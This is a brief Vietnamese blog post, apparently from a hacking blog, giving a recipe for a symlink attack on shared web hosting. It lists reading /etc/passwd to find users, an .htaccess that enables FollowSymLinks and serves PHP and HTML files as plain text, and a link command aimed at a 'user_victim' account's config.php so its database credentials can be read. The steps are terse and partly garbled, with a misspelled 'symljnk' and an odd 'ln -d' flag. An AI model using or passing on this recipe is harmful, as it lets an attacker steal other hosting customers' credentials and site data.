Symlink là tạo 1 file trung gian để xem 1 file thuộc sở hữu của user khác cùng server Tìm user
.htaccess
symljnk đến user
view
cat /etc/passwd
Options Indexes FollowSymLinks
DirectoryIndex 1.htm
DirectoryIndex 1.html
AddType txt .php
AddHandler txt .php
AddType txt .html
AddHandler txt .html
ln -d /home/user_victim/public_html/config.php checked.txt
0 nhận xét:
Đăng nhận xét